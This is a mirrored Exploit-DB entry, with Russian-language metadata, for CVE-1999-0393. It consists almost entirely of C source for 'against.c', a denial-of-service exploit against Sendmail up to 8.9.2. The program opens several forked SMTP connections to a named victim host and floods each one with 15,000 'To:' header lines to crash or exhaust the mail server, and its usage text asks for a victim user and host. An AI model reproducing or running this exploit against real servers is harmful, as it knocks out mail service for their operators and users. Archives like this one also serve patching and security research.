- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23167
- Проверка EDB
-
- Пройдено
- Автор
- MARCHEW
- Тип уязвимости
- DOS
- Платформа
- IRIX
- CVE
- cve-1999-0393
- Дата публикации
- 1998-12-12
C:
/*
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
(c) 1999 by <[email protected]>
Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#define MAXCONN 4
#define LINES 15000
struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;
int main(int argc,char* argv[]) {
printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
if (argc-3) {
printf("Usage: %s victim_user victim_host\n",argv[0]);
exit(0);
}
hp=gethostbyname(argv[2]);
if (!hp) {
perror("gethostbyname");
exit(1);
}
fprintf(stderr,"Doing mess: ");
for (;loop<MAXCONN;loop++) if (!(x=fork())) {
FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
usleep(100000);
fprintf(d,"helo tweety\n");
fprintf(d,"mail from: [email protected]\n");
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
fprintf(d,"data\n");
usleep(100000);
for(loop=0;loop<LINES;loop++) {
if (!(loop%100)) fprintf(stderr,".");
fprintf(d,"To: x\n");
}
fprintf(d,"\n\n\nsomedata\n\n\n");
fprintf(d,".\n");
sleep(1);
fprintf(d,"quit\n");
fflush(d);
sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
}
waitpid(x,&loop,0);
fprintf(stderr,"ok\n");
return 0;
}- Источник
- www.exploit-db.com
